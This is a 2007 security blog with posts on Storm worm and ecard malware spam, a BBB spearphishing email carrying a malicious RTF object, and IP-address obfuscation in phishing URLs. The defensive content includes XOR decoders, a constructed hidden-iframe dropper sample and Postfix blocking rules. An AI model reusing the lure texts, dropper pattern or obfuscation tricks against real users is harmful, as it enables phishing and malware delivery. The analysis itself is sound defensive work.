Saturday, December 22, 2007

Heap 'Off By 1' Overflow Illustrated

I delivered a presentation at SANS CDI 2007 last Sunday, titled Heap 'Off By 1' Overflow Illustrated. It was based on my GCIH Gold paper A Heap o’ Trouble, Heap-based flag insertion buffer overflow in CVS.

The attack is a few years old now, but the 'off by one' technique is interesting: the attacker has a single unaccounted 'M' at his/her disposal, and that is enough to seize control of program execution. The shellcode is dropped in one character at a time, by subverting the heap's unlink process. I was able to follow the attack, byte-by-byte, thanks to liberal use of libvoodo, and some perl scripts.

The attack's author, vl4d1m1r of Ac1dB1tch3z, wrote his own analysis earlier this year in Phrack 64.

Fellow SANS Technology Institute student Manuel Humberto Santander Pelaez also delivered a presentation at CDI 2007, on Antiforensics.


Tuesday, November 20, 2007

Detecting Spam with Genetic Regular Expressions

My GIAC Certified Intrusion Analyst (GCIA) Gold paper was accepted today: Detecting Spam with Genetic Regular Expressions.

The concept behind the paper is to see if regexes may be 'evolved' via genetic algorithms to detect and block spam.

Short answer: it works. For more details (including POC code), check out the paper.

Many thanks to my GCIA Gold adviser Johannes Ullrich!

I'd love to hear any feedback on the paper.

Thursday, October 25, 2007

Community SANS Boston 2007 day 4

I'm blogging live from Community SANS Boston 2007.

Today we finished up the Crypto domain, and completed Operations Security. Loads of great comments from class. We discussed fairness (and legality) regarding Internet history searches. Many of us have been in the position where a manager says "John Doe is wasting time on the Internet: show me a history of his Internet usage."

I believe that you don't use technology to solve a personnel problem. If an employee is 'wasting time' on the internet, they could be wasting time in other ways, such as on the phone, long breaks, playing games, etc. It's not a technology problem; it's a management problem.

If you were to discipline 'John' for non-business internet usage, you should ask yourself: how many other employees use the internet just as much (or more) for non business purposes? Are you holding them to the same level of scrutiny as you are holding John? If not, you may have legal issues.

Nick brought in a few books today, including the aforementioned The Code Book by Simon Singh. Also the classics The Cuckoo's Egg by Clifford Stoll, and The Art of Deception by Kevin Mitnick.

The Code Book opens with the story of Mary Queen of Scots: she was executed for conspiring to overthrow Elizabeth I and restore Catholic rule in England. Often left out of the history books is the fact that cryptanalysis led to her death: Queen Elizabeth was hesitant to execute her cousin, until proof of treason was revealed when Mary's encrypted letters were decrypted.

Wednesday, October 24, 2007

Community SANS Boston 2007 day 3

I'm blogging live from Community SANS Boston 2007. Right now the Red Sox are on, and winning game 1 of the World Series 6-1.

We started on the Crypto domain today; my favorite domain. The history of crypto is fascinating: the course of history has changed because of crypto. I recommended The Codebreakers by David Kahn to my students; it is a fantastic history of crypto, up through the late 1960s. The story of the Japanese Purple machine is fascinating. Breaking Purple (the diplomatic cipher machine) and the Japanese naval code JN-25 saved untold thousands of lives, shaved years off World War II in the Pacific theater, led to the decisive victory at the Battle of Midway, and changed the course of the war.

Miguel, one of my students, recommended The Code Book by Simon Singh, and Cryptonomicon by Neal Stephenson. I have added them to my Amazon list.

Monday, October 22, 2007

Community SANS Boston 2007 day 1

Community SANS Boston 2007 began today; I thought day 1 went very well.

Mike, a gentleman who attended my Incident Handling/Hacker Techniques class last year, decided to pursue the CISSP® certification and attended this class. After earning his GCIH last year, he was promoted and now heads up a security team at his company. He decided it was time to round out his information security management knowledge. It's always great to see repeat students!

We have a great cross-section of industries represented in class, including some military and financial folks.

We covered the Access Control Systems & Methodology today. A universal point that came up today: access control is hard, and often thankless. We often see a litany of access requests, with many folks clearly requesting more access than is required. Users can be quite vocal when access is denied or limited, and we never hear "Great job on access control today! You really nailed it!!"

A few questions from today:

Q: Are the questions on the CISSP® in domain order, or randomized?
A: The questions are in random order.

Q: What are the new CISSP® experience requirements as of Oct 1st, 2007?
A: (ISC)2 now requires 5 years of experience in two or more domains in the Common Body of Knowledge (and you may subtract 1 year with a 4-year degree). This is a change from the old rules, which required 4 years of experience in one of the domains in the Common Body of Knowledge. See the new CISSP® experience requirements.

As an FYI, the next CISSP® @Home starts in January.

Monday, September 17, 2007

Community SANS Boston 2007

Community SANS Boston 2007 begins October 22nd. I'll be teaching MGT 414, SANS® +S™ Training Program for the CISSP® Certification Exam.

Looks like the next SANS CISSP® @Home will begin in late November. I'll post the schedule once it's official.

Thursday, September 06, 2007

Storm worm now warns of RIAA investigation

The latest change in the ongoing Storm Worm assault is email warning of RIAA investigations. Here are some Subject lines from this AM:
  • Subject: Big brother is watching you.
  • Subject: Careful, being watched.
  • Subject: Do you know who is watching you?
  • Subject: The things you do online are being watched.
  • Subject: What you do online is no longer private.
  • Subject: You are being watched online.
  • Subject: Your Privacy is being violated
  • Subject: Your online activities are no longer safe.
  • Subject: Your online life is not private
  • Subject: Your privacy is no longer safe
There are various bodies; here's an example:
If you download music of other files, you're being tracked. The RIAA is after everyone they can find. Our program will eliminate any trace to you. Keep your right to privacy safe, and download our software for free.
The emails point to an IP address, suggesting you "Download Tor". The resulting web page offers 'tor.exe', which Avira identifies as "Worm/Stom.tck".

Sunday, July 08, 2007

'Ecard' spams are now showing 'abnormal activity'

The 'Ecard' spams have now switched over to 'abnormal activity' spams. Here's a summary of the subject lines:
  • Subject: ATTN!
  • Subject: Alert!
  • Subject: Malware Alert
  • Subject: Spyware Alert!
  • Subject: Spyware Detected!
  • Subject: Trojan Alert!
  • Subject: Trojan Detected!
  • Subject: Virus Activity Detected!
  • Subject: Warning!
  • Subject: Worm Activity Detected!
  • Subject: Worm Alert!
  • Subject: Worm Detected!
Here's an example body:
Dear Customer,

Our robot has detected an abnormal activity from your IP adress
on sending e-mails. Probably it is connected with the last epidemic
of a worm which does not have official patches at the moment.

We recommend you to install http://XX.71.238.156/?7c634591933434671c16a2e59b1283bd17061a8 to remove worm files and stop email sending, otherwise your account will be blocked.

Customer Support

The exe on the linked site is now called 'patch.exe,' which is identified as 'Trojan horse TR/Small.DBY.DB' by Avira.

Tuesday, July 03, 2007

4th of July ecard malware

The 'ecard' spam wave has been updated with 4th of July-themed subjects:
  • Subject: 4th Of July Celebration
  • Subject: America the Beautiful
  • Subject: America's 231st Birthday
  • Subject: American Pride, On The 4th
  • Subject: Americas B-Day
  • Subject: Celebrate Your Nation
  • Subject: Celebrate Your Independence
  • Subject: Fireworks on The 4th
  • Subject: Fourth of July Party
  • Subject: God Bless America
  • Subject: Happy 4th of July
  • Subject: Happy B-Day USA
  • Subject: Happy Birthday America
  • Subject: Happy Fourth of July
  • Subject: Independence Day At The Park
  • Subject: Independence Day Celebration
  • Subject: Independence Day Party
  • Subject: July 4th B-B-Q Party
  • Subject: July 4th Family Day
  • Subject: July 4th Fireworks Show
  • Subject: Your Nations Birthday
The Internet Storm Center has a writeup.

The malware is the same as in the last wave. The index.html file contains an obfuscated, hex-encoded payload. The ecard.exe executable is updated frequently to evade virus scanners; the current copy scans as 'TR/Small.DBY.DB' by Avira.

Here's a sample email body:
Hi. Family member has sent you a greeting ecard.
See your card as often as you wish during the next 15 days.


If your email software creates links to Web pages, click on your
card's direct www address below while you are connected to the Internet:


Or copy and paste it into your browser's "Location" box (where Internet addresses go).

PRIVACY honors your privacy. Our home page and Card Pick Up have links to our Privacy Policy.

By accessing your card you agree we have no liability.
If you don't know the person sending the card or don't wish to see the card, please disregard this Announcement.

We hope you enjoy your awesome card.

Wishing you the best,

Saturday, June 30, 2007

More greeting card spam

The greeting card spam wave continues. Subject lines vary somewhat; here's a sampling from today:
  • You've received a greeting card from a class-mate!
  • You've received a greeting card from a colleague!
  • You've received a greeting card from a family member!
  • You've received a greeting card from a friend!
  • You've received a greeting card from a neighbor!
  • You've received a greeting card from a school mate!
  • You've received a greeting ecard from a class-mate!
  • You've received a greeting ecard from a colleague!
  • You've received a greeting ecard from a family member!
  • You've received a greeting ecard from a friend!
  • You've received a greeting ecard from a neighbour!
  • You've received a greeting ecard from a partner!
  • You've received a greeting ecard from a worshipper!
  • You've received a greeting postcard from a colleague!
  • You've received a greeting postcard from a family member!
  • You've received a greeting postcard from a friend!
  • You've received a postcard from a class-mate!
  • You've received a postcard from a colleague!
  • You've received a postcard from a family member!
  • You've received a postcard from a partner!
  • You've received an ecard from a partner!
  • You've received an ecard from a worshipper!
They are now linking to IP addresses (as opposed to .hk sites in the early stages).

The Internet Storm Center has an excellent analysis.

Here's a sample 'index.html' file:

The hex code goes on for awhile:

The file is obfuscated with XORed hexadecimal: each byte of the payload is XORed with a one-byte key and written out as two hex digits. The key in this case is '227' (it changes with each copy, for a simple form of polymorphism). This perl snippet will decode the XORed hex; feed it the hex string from index.html on standard input:

perl -e 'while(<>){ while(/([0-9a-fA-F]{2})/g){ print chr(hex($1) ^ 227) } }'

If you are analyzing your own copy, change the '227' in the perl code to match the key in the index.html file.

The de-obfuscated code looks like this:

Among other nastiness, it retrieves the file http://XX.252.250.104/file.php, which is really a Windows executable that BitDefender identifies as: "Generic.Malware.dld!!.2526793B"
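The same decoding in Python, as an added example written for this page rather than the post's own perl: it pulls the hex blob out of a page, and, since the key changes with each copy, recovers it by brute force (a one-byte XOR key has only 256 candidates, and only the right one yields recognisable HTML/JS) instead of reading it from the wrapper script. The sample page, its plaintext and the host name in it are constructed for the example; the real pages differ in layout.

```python
# Added example (not from the original post): decode the XOR-obfuscated hex
# payload found in an ecard 'index.html', and recover the per-copy key by
# brute force when the copy at hand uses a key other than 227.
import re

HEX_PAIR = re.compile(r"[0-9a-fA-F]{2}")


def xor_hex_decode(hex_text: str, key: int) -> bytes:
    """Turn a run of hex digit pairs back into bytes, XORing each with a one-byte key."""
    return bytes(int(pair, 16) ^ key for pair in HEX_PAIR.findall(hex_text))


def xor_hex_encode(data: bytes, key: int) -> str:
    """The inverse transform (what the spammer's generator does); used below for sample input."""
    return "".join("%02x" % (byte ^ key) for byte in data)


def longest_hex_run(html: str, min_len: int = 32) -> str:
    """Pull the obfuscated blob out of the page: the longest unbroken run of hex digits."""
    runs = re.findall(r"[0-9a-fA-F]{%d,}" % min_len, html)
    return max(runs, key=len) if runs else ""


def recover_key(hex_text: str, markers=(b"<script", b"<iframe", b"document.write")):
    """Brute-force the single-byte key: only the right one exposes a known tag.

    Returns the first key whose decoding contains one of the markers, or None.
    """
    for key in range(256):
        candidate = xor_hex_decode(hex_text, key).lower()
        if any(marker in candidate for marker in markers):
            return key
    return None


def deobfuscate_page(html: str) -> tuple:
    """Return (key, decoded_bytes) for a page of this form, or (None, b'') if nothing is found."""
    blob = longest_hex_run(html)
    if not blob:
        return None, b""
    key = recover_key(blob)
    if key is None:
        return None, b""
    return key, xor_hex_decode(blob, key)


# Constructed sample: a dropper-style page wrapping a blob XORed with key 227.
# The plaintext and the host (a documentation address) are made up for this example.
SAMPLE_PLAINTEXT = (
    b'<script>document.write(\'<iframe src="http://198.51.100.7/file.php" '
    b'width=0 height=0></iframe>\');</script>'
)
SAMPLE_KEY = 227
SAMPLE_INDEX_HTML = (
    "<html><body><script>var s='" + xor_hex_encode(SAMPLE_PLAINTEXT, SAMPLE_KEY)
    + "';</script></body></html>"
)

if __name__ == "__main__":
    key, decoded = deobfuscate_page(SAMPLE_INDEX_HTML)
    print("key:", key)
    print(decoded.decode("latin-1"))
```

The marker test is deliberately narrow: with a single-byte key, a wrong guess turns '<' and '.' into bytes that never appear in the payload, so the search cannot return a false key for this kind of content. For blobs that decode to something other than HTML or JavaScript, swap the markers for strings you expect in that payload.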

Tuesday, June 26, 2007

HK greeting card malware

Beginning this morning we received a torrent of 'greeting card' malware, linking to domains in Hong Kong.

The excellent Chinese Internet Security Response Team has a blog entry on this attack.

Sites today include 'menot', 'notme,' and 'catcher,' all in the .HK tld.

The attack appears highly widespread. Avira detects EXP/iFrame.D.1 in the drive-by JavaScript included in the site's 'index.html' file, and TR/Small.DBY.DH in ecard.exe (helpfully offered if the drive-by exploit fails, with the text "We are currently testing a new browser feature. If you are not able to view this ecard, please click here to view in its original format.").

The spams look like this:

From: "*****.hk"
Subject: You've received a postcard from a family member!
Date: Tue, 26 Jun 2007 19:19:33 -0500

Good day.

Your family member has sent you an ecard from ******.hk.

Send free ecards from ******.hk with your choice of colors, words and music.

Your ecard will be available with us for the next 30 days. If you wish to keep the ecard longer, you may save it on your computer or take a print.

To view your ecard, choose from any of the following options:


Click on the following Internet address or
copy & paste it into your browser's address box.



Copy & paste the ecard number in the "View Your Card" box at

Your ecard number is

Best wishes,

*If you would like to send someone an ecard, you can do so at

Thursday, June 21, 2007

'' spearphishing attack

I've seen a number of fake '' emails, spammed to senior positions.

The Better Business Bureau's official site describes the attack.

I attached a cleaned-up copy below, with headers.

The emails contain an attachment, in these cases called 'Document_for_Case.doc'. It's an RTF (Rich Text Format) document that contains a malicious embedded object; here's the beginning of that file:

{\rtf1\ansi\ansicpg1252\deff0\deflang1033{\fonttbl{\f0\fswiss\fcharset0 Arial;}}
{\*\generator Msftedit;}\viewkind4\uc1\pard\f0\fs20 This document contains an embedded object. To open it double-click the icon.\par
{\object\objemb{\*\objclass Package}\objw2325\objh765{\*\objdata

That document scans 'clean' by most virus scanners. On 6/21/2007 reported that only 9 of their 30 scanners spot it.

This attack may be fairly damaging, given the weak antivirus coverage, the fact that it is a legitimate '.doc' file (typically allowed through Internet mail relays, unlike .exe attachments, which are often blocked), and the fact that it is targeted at a small number of senior users.

Here's the email, somewhat cleaned up. The original was in html format:

Received: from ( [])
by *****.*****.org (Postfix) with ESMTP id 0AAC85F13D4
for <*****@*****.org>; Thu, 21 Jun 2007 09:05:37 -0400 (EDT)
Received: from (unknown [])
by (Postfix) with ESMTP id 38E97AE182
for <*****@****.org>; Thu, 21 Jun 2007 16:05:03 +0300 (EEST)
Received: from localhost.localdomain ([])
by (Lotus Domino Release 5.0.9)
with SMTP id 2007062116045807:59067 ;
Thu, 21 Jun 2007 16:04:58 +0300
From: Better Business Bureaus
Subject: Complaint Case Number 450596111
MIME-Version: 1.0
Date: Thu, 21 Jun 2007 16:04:58 +0300
Content-Type: multipart/mixed; boundary=38ACD4BC0E5E9B20090A53C405940998
To: undisclosed-recipients:;

Dear Mr./Mrs. ***** *****

You have received a complaint in regards to your business services. The
complaint was filled by Mr. ***** ***** on 6/19/2007

Complaint Case Number: XXXXXXXXXX

Complaint Made by Consumer Mr. ***** *****

Complaint Registered Against: Company ********************

Date: 6/19/2007

Instructions on how to resolve this complaint as well as a copy of the original complaint are attached to this email.

Disputes involving consumer products and/or services may be arbitrated.
Unless they directly relate to the contract that is the basis of this dispute
the following claims will be considered for arbitration only if all parties
agree in writing that the arbitrator may consider them:

- Claims based on product liability;
- Claims for personal injuries;
- Claims that have been resolved by a previous court action, arbitration, or written agreement between the parties.

The decision as to whether your dispute or any part of it can be arbitrated rests solely with the BBB.

The BBB offers its members a binding arbitration service for disputes involving marketplace transactions.

Arbitration is a convenient, civilized way to settle disputes quickly and fairly, without the costs associated with other legal options.

© 2003 Council of Better Business Bureaus, Inc. All Rights Reserved.

Tuesday, June 05, 2007

Upcoming conferences and SANS Monterey

I will teach SANS Management 414: SANS® +S™ Training Program for the CISSP® Certification Exam in St. Louis, beginning this Monday:

Community SANS Portland Maine 2007 was just announced, beginning August 20th. It's Hacker Techniques (Security 504), in 'bootcamp' style. It's SANS's first conference in Maine.

I just got back from beautiful Monterey, CA, where I taught Security 504: Hacker Techniques, Exploits & Incident Handling:

I've been to other parts of California; Monterey is my favorite so far.

Thursday, April 26, 2007

Mix and Match

An additional point worth mentioning regarding IP address obfuscation is that the techniques can be mixed and matched within the same IP address.

All or most of these formats should work in all browsers. Additionally, in dotted format, each octet can be in a different base. For example, 207.0x8E.0203.235 (decimal hex octal decimal) is a valid, though unconventional, equivalent to the above addresses: it resolves to 207.142.131.235. (Wikipedia article on IPv4)
Spammers are actively using this technique; this URL arrived today in a Pump and Dump stock spam:


The link in the email refers to, but actually redirects to a random .BIZ site.

The format of this URL is:
  1. 'Dotted Hex with leading zeroes' .
  2. 'Dotted Octal with leading zeroes' .
  3. 'Dotted Hex with leading zeroes' .
  4. 'Dotted Decimal'.
The address translates to in dotted quad (decimal) format.

Tuesday, April 24, 2007

URL Obfuscation for fun and profit

We've all grown accustomed to the 'dotted quad' format of IP addresses. Localhost is 127.0.0.1, for example.

'127.0.0.1' is simply a convenient shorthand for a 32-bit number, in this case written as four 8-bit numbers. There are numerous other ways to represent that 32-bit number. The simplest is a single decimal: '127.0.0.1' is decimal 2,130,706,433.

An easy way to make that conversion is to open up a calculator; Windows calculator in Scientific mode works fine (go to Options-> Scientific). Choose binary mode ('Bin') and enter the four octets back to back as one 32-bit binary number: 01111111 (127), 00000000 (0), 00000000 (0), 00000001 (1). Then hit decimal ('Dec').

Your answer should be 2130706433. To verify, open a command prompt and type 'ping 2130706433'. Which IP address answered?

There are other legitimate ways to represent an IP address; many are summarized in this Wikipedia article. Other forms include dotted hex, dotted octal, and others.

This topic is normally an arcane source of trivia for die-hard IP geeks. I mention it today because spammers and phishers abuse these forms of URL obfuscation in an attempt to bypass IP address blocking schemes.

Here are some live examples harvested from today's mail spool:

Bank phishing attempt using dotted hex IP address:
  • Subject: Arizona Federal - Account Suspended.
  • Embedded URL: http://0xcb.0xe9.0xc7.0x92/(deleted)/
Ebay phishing attempt using a decimal IP
  • Subject: Question about payment for item: #2070651641
  • Embedded URL: http://1478700420:82/(deleted)&co/reg.php
Paypal phishing attempt using a dotted octal URL:
  • Subject: Update your PayPal records
  • Embedded URL: http://0112.0000.0067.0012/(deleted)/index.htm
MSN phishing scam in dotted hex, with leading '0's:
  • Subject: Fwd: 721362
  • Embedded URL: href="http://0x000000000000000D8.0x0D3.0x000000000000000009E.0x00000(deleted)">
As the last example illustrates, these obfuscation techniques may be further confused by adding leading zeroes.
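Blocking by pattern is one approach; the other is to normalize whatever the spammer wrote back to the real address and compare that against your blocklist. Here is an added example of the latter (written for this page; not the post's own code), covering the four phishing URLs above and the mixed-base address from the 'Mix and Match' post. It follows inet_aton() rules, which go beyond what the posts show: 'a.b.c' puts c in the low 16 bits, 'a.b' puts b in the low 24 bits, and a bare number is the whole 32-bit address. The expected values in SAMPLES were computed for this example, and the URL-matching regex is my own.

```python
# Added example (not from the original post): bring the obfuscated IPv4 host
# forms shown above back to dotted quad, following inet_aton() rules, so that
# a blocklist comparison sees the real address instead of the spammer's spelling.
import re


def parse_ipv4_part(text: str) -> int:
    """One numeric part, read the way inet_aton() does.

    '0x'/'0X' prefix: hexadecimal; leading '0' with more than one digit: octal;
    otherwise decimal. Leading zeros after the prefix are allowed ('0x0D8').
    Raises ValueError for anything that is not a number in that base ('08', 'www').
    """
    t = text.lower()
    if t.startswith("0x"):
        return int(t[2:], 16)      # int('', 16) raises, so a bare '0x' is rejected
    if len(t) > 1 and t.startswith("0"):
        return int(t, 8)
    return int(t, 10)


def to_dotted_quad(host: str) -> str:
    """Canonical 'a.b.c.d' for any inet_aton()-style spelling of an IPv4 address.

    Each part may use its own base, which is what makes '207.0x8E.0203.235' legal.
    With fewer than four parts the final part fills the remaining low bytes.
    """
    parts = [parse_ipv4_part(p) for p in host.split(".")]
    if not 1 <= len(parts) <= 4:
        raise ValueError("too many parts: %r" % host)
    *leading, last = parts
    if any(not 0 <= p <= 255 for p in leading):
        raise ValueError("octet out of range: %r" % host)
    low_bytes = 4 - len(leading)            # bytes the final part must fill
    if not 0 <= last < 256 ** low_bytes:
        raise ValueError("final part out of range: %r" % host)
    value = 0
    for p in leading:
        value = (value << 8) | p
    value = (value << (8 * low_bytes)) | last
    return ".".join(str((value >> shift) & 0xFF) for shift in (24, 16, 8, 0))


def is_obfuscated_ip(host: str) -> bool:
    """True when the host is a numeric IPv4 address written in any non-canonical form."""
    try:
        return to_dotted_quad(host) != host
    except ValueError:
        return False                       # a real hostname, not a number


# Host portion of an http(s) URL; assumption made for this example, not from the post.
HOST_IN_URL = re.compile(r"https?://([^/:?#\s\"'<>]+)", re.I)


def obfuscated_hosts(text: str):
    """Yield (as_written, canonical) for every obfuscated numeric host in some text."""
    for host in HOST_IN_URL.findall(text):
        if is_obfuscated_ip(host):
            yield host, to_dotted_quad(host)


# The addresses quoted in the posts, plus inet_aton() forms they do not show (constructed).
SAMPLES = {
    "0xcb.0xe9.0xc7.0x92": "203.233.199.146",   # dotted hex
    "1478700420": "88.35.45.132",               # decimal
    "0112.0000.0067.0012": "74.0.55.10",        # dotted octal
    "207.0x8E.0203.235": "207.142.131.235",     # mixed bases
    "2130706433": "127.0.0.1",                  # the calculator exercise above
    "0x7F000001": "127.0.0.1",                  # plain hex
    "017700000001": "127.0.0.1",                # plain octal
    "127.1": "127.0.0.1",                       # two-part form
    "127.000.000.001": "127.0.0.1",             # leading zeros make these octal
}

if __name__ == "__main__":
    for spelled, expected in SAMPLES.items():
        canonical = to_dotted_quad(spelled)
        print("%-22s -> %-16s %s" % (spelled, canonical, "ok" if canonical == expected else "MISMATCH"))
```

Note the last sample: a leading zero makes an octet octal, so '127.000.000.001' is still 127.0.0.1 here, but '08' or '192.168.010.256' raise ValueError exactly as inet_aton() would reject them. Browsers of the period and C's inet_aton() agree on these rules; if your blocklist code uses a stricter parser, compare against the canonical form this function returns rather than the raw host.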

The good news is these phishing attempts are trivial to block at the MTA, assuming it can reject mail based on regular-expression matches against the message body.
Postfix is one such mailer, with its excellent support for Perl-Compatible Regular Expressions.

Here are the pcre maps I use to block these URL obfuscation attacks:
  • /http:\/\/(0x0*[0-9A-F]{2}\.){3}0x0*[0-9A-F]{2}/ REJECT URL Obfuscation
  • /http:\/\/0*[0-9]{8,10}/ REJECT URL Obfuscation
  • /http:\/\/0x0*[0-9A-F]{8}/ REJECT URL Obfuscation
  • /http:\/\/(0+[0-7]{3}\.){3}0+[0-7]{3}/ REJECT URL Obfuscation
These block dotted hexadecimal, decimal, hexadecimal, and dotted octal URLs, respectively. You may enable them in Postfix by saving them to a file (in this case, /usr/local/etc/postfix/bodyfilt.pcre) and adding the following line to main.cf:

body_checks = pcre:/usr/local/etc/postfix/bodyfilt.pcre

Postfix PCRE maps are case-insensitive by default. If your MTA's are not, use '[0-9A-Fa-f]' for a hex digit (for example). Two caveats: body_checks examines one raw body line at a time and does not decode base64 or quoted-printable, so a URL inside an encoded MIME part, or split across lines by a quoted-printable soft line break, will not be seen; and these rules match specific spellings, so a mixed-base address such as 207.0x8E.0203.235, or one with single-digit hex octets such as 0x5.0x5.0x5.0x5, passes all four.
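To see exactly what the four rules do and do not catch before deploying them, here they are as an added example (written for this page, not part of the post) translated one-for-one into Python regexes and run over constructed body lines in the order Postfix would apply them. The first four URLs are the ones quoted above; the remaining lines are made up to probe the edges of the patterns.

```python
# Added example (not from the original post): the four Postfix body_checks rules
# above, expressed as Python regexes and run over constructed mail-body lines,
# to show what each one catches and, just as important, what gets past them.
import re

# Same patterns as the pcre map, in the same order; Postfix stops at the first hit.
# Postfix pcre maps are case-insensitive by default, hence re.I.
BODY_CHECKS = [
    (re.compile(r"http://(0x0*[0-9A-F]{2}\.){3}0x0*[0-9A-F]{2}", re.I), "dotted hex"),
    (re.compile(r"http://0*[0-9]{8,10}", re.I), "decimal"),
    (re.compile(r"http://0x0*[0-9A-F]{8}", re.I), "hex"),
    (re.compile(r"http://(0+[0-7]{3}\.){3}0+[0-7]{3}", re.I), "dotted octal"),
]


def matching_rule(line: str):
    """Name of the first rule that would reject this body line, or None if it passes."""
    for pattern, name in BODY_CHECKS:
        if pattern.search(line):
            return name
    return None


def check_body(body: str) -> dict:
    """Apply the rules line by line, as body_checks does; map each rejected line to its rule."""
    verdicts = {}
    for line in body.splitlines():
        name = matching_rule(line)
        if name:
            verdicts[line] = name
    return verdicts


# Constructed sample lines. The first four URLs are the ones quoted in the post.
CAUGHT = [
    "Click here: http://0xcb.0xe9.0xc7.0x92/(deleted)/",
    "Item link: http://1478700420:82/(deleted)&co/reg.php",
    "Update: http://0112.0000.0067.0012/(deleted)/index.htm",
    'href="http://0x000000000000000D8.0x0D3.0x000000000000000009E.0x00000(deleted)">',
    "Plain hex host: http://0x7F000001/login",
]
MISSED = [
    "Mixed bases: http://207.0x8E.0203.235/login",        # no rule expects mixed bases
    "Short hex octets: http://0x5.0x5.0x5.0x5/login",     # rule 1 wants exactly two hex digits
    "Two-part octal form: http://0177.1/login",           # 0177.1 is 127.0.0.1 to inet_aton()
    "Ordinary site: http://www.example.com/",
]

if __name__ == "__main__":
    for line in CAUGHT + MISSED:
        print("%-12s %s" % (matching_rule(line) or "PASS", line))
```

The three evasions in MISSED are all valid addresses to inet_aton() and to browsers of the period, so pattern rules like these are a cheap first filter rather than a complete defence; rejecting any URL whose host is numeric but not in canonical dotted-quad form closes those gaps. Remember too that body_checks only sees raw lines, so none of this applies to a base64-encoded HTML part.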

Tuesday, April 17, 2007


I just finished up teaching SANS@Home Management 414: SANS® +S™ Training Program for the CISSP® Certification Exam with Dr. Eric Cole, which began on Monday, February 26, 2007, and ran through Thursday, April 12, 2007.

The next SANS CISSP @Home begins on July 16th.

It will be 13 sessions, Mondays and Wednesday nights. The last class was a blast; I'm looking forward to this one.

Wednesday, March 21, 2007


I taught Stay Sharp: Using Regular Expressions in Boston on May 3rd:

Thursday, March 15, 2007

Community SANS Maine 2007

SANS just tentatively announced Community SANS Portland Maine 2007, beginning August 20th.

No details yet on hotel, etc. I plan to teach one track there.

Monday, March 05, 2007

Hacker Techniques at SANS Monterey

I will teach Security 504: Hacker Techniques, Exploits & Incident Handling at SANS Monterey in May.

Friday, February 09, 2007


Five of my papers on Cryptography have been posted as part of the 'GIAC Research in the Common Body of Knowledge.' They include papers on AES, DES, Kerberos, and others.

My papers on Artificial Intelligence and Intrusion Detection will be posted shortly.

Older stuff

I recently taught SANS Security 504 (Hacker Techniques, Exploits and Incident Handling), Security 452: Mastering Packet Analysis, and Security 450: Defeating Rogue Access Points at Community SANS Portsmouth:

I led the SANS Stay Sharp "Mastering Packet Analysis" course on July 20th, 2006:

I led the Community SANS Boston 2006 CISSP conference

I am a contributing author to SANS HIPAA Security Implementation